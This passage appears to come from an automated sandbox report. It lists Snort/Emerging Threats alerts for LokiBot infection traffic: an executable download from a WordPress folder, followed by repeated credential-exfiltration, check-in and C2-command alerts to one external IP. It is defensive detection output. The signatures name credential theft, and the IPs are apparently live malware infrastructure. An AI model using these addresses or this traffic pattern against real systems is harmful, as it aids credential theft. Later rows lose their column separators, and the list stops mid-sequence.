,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                        01/05/21-19:05:22.500040 | TCP | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49167 | 80 | 192.168.2.22 | 83.172.144.37
                                                                                        01/05/21-19:06:07.649980 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49168 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:07.649980 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:07.649980 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:07.649980 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49168 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.163209 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49169 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.163209 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.163209 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.163209 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49169 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.473302 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.473302 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.473302 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.473302 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.645122 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49170 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:08.887025 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.887025 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.887025 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:08.887025 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.065680 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49171 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:09.279376 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49172 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.279376 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49172 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.279376 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49172 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.279376 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49172 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.462394 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49172 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:09.669670 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49173 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.669670 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49173 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.669670 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49173 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.669670 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49173 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:09.843837 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49173 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:10.067266 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49174 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.067266 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49174 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.067266 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49174 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.067266 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49174 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.236854 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49174 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:10.499611 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49175 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.499611 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49175 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.499611 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49175 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.499611 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49175 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.673143 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49175 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:10.888136 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49176 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.888136 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49176 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.888136 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49176 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:10.888136 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49176 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.065621 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49176 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:11.296993 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49177 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.296993 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49177 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.296993 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49177 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.296993 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49177 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.461579 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49177 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:11.686950 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49178 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.686950 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49178 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.686950 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49178 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.686950 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49178 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:11.871413 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49178 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:12.075634 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49179 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.075634 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49179 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.075634 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49179 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.075634 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49179 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.243051 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49179 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:12.449877 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49180 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.449877 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49180 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.449877 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49180 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.449877 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49180 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.609106 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49180 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:12.832799 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49181 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.832799 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49181 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.832799 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49181 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.832799 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49181 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:12.987731 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49181 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:13.213064 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49182 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:13.213064 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49182 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:13.213064 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49182 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:13.213064 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49182 | 80 | 192.168.2.22 | 185.206.215.56
                                                                                        01/05/21-19:06:13.388159 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49182 | 185.206.215.56 | 192.168.2.22
                                                                                        01/05/21-19:06:13.606387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.778989TCP2025483ET TROJAN LokiBot Fake 404 Response8049183185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.002546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.168912TCP2025483ET TROJAN LokiBot Fake 404 Response8049184185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.391399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.558086TCP2025483ET TROJAN LokiBot Fake 404 Response8049185185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.788464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.954180TCP2025483ET TROJAN LokiBot Fake 404 Response8049186185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.165872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.352806TCP2025483ET TROJAN LokiBot Fake 404 Response8049187185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.552401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.734059TCP2025483ET TROJAN LokiBot Fake 404 Response8049188185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.960354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.139385TCP2025483ET TROJAN LokiBot Fake 404 Response8049189185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:16.358508TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.531882TCP2025483ET TROJAN LokiBot Fake 404 Response8049190185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:16.795879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.967213TCP2025483ET TROJAN LokiBot Fake 404 Response8049191185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.183871TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.344388TCP2025483ET TROJAN LokiBot Fake 404 Response8049192185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.566777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.726876TCP2025483ET TROJAN LokiBot Fake 404 Response8049193185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.949146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.134410TCP2025483ET TROJAN LokiBot Fake 404 Response8049194185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:18.364453TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.531194TCP2025483ET TROJAN LokiBot Fake 404 Response8049195185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:18.788238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2025381ET TROJAN LokiBot Checkin4919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.788238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.959883TCP2025483ET TROJAN LokiBot Fake 404 Response8049196185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.176157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2025381ET TROJAN LokiBot Checkin4919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.176157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.341245TCP2025483ET TROJAN LokiBot Fake 404 Response8049197185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.576040TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2025381ET TROJAN LokiBot Checkin4919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.576040TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.751716TCP2025483ET TROJAN LokiBot Fake 404 Response8049198185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:19.958724TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2025381ET TROJAN LokiBot Checkin4919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:19.958724TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.125690TCP2025483ET TROJAN LokiBot Fake 404 Response8049199185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:20.390921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2025381ET TROJAN LokiBot Checkin4920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.390921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.569029TCP2025483ET TROJAN LokiBot Fake 404 Response8049200185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:20.950521TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2025381ET TROJAN LokiBot Checkin4920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:20.950521TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.111865TCP2025483ET TROJAN LokiBot Fake 404 Response8049201185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:21.679580TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2025381ET TROJAN LokiBot Checkin4920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.679580TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:21.837782TCP2025483ET TROJAN LokiBot Fake 404 Response8049202185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:22.303822TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2025381ET TROJAN LokiBot Checkin4920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.303822TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.484253TCP2025483ET TROJAN LokiBot Fake 404 Response8049203185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:22.694392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2025381ET TROJAN LokiBot Checkin4920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.694392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:22.877247TCP2025483ET TROJAN LokiBot Fake 404 Response8049204185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.094147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2025381ET TROJAN LokiBot Checkin4920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.094147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.267446TCP2025483ET TROJAN LokiBot Fake 404 Response8049205185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.470458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2025381ET TROJAN LokiBot Checkin4920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.470458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.640827TCP2025483ET TROJAN LokiBot Fake 404 Response8049206185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:23.862730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:23.862730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.22185.206.215.56
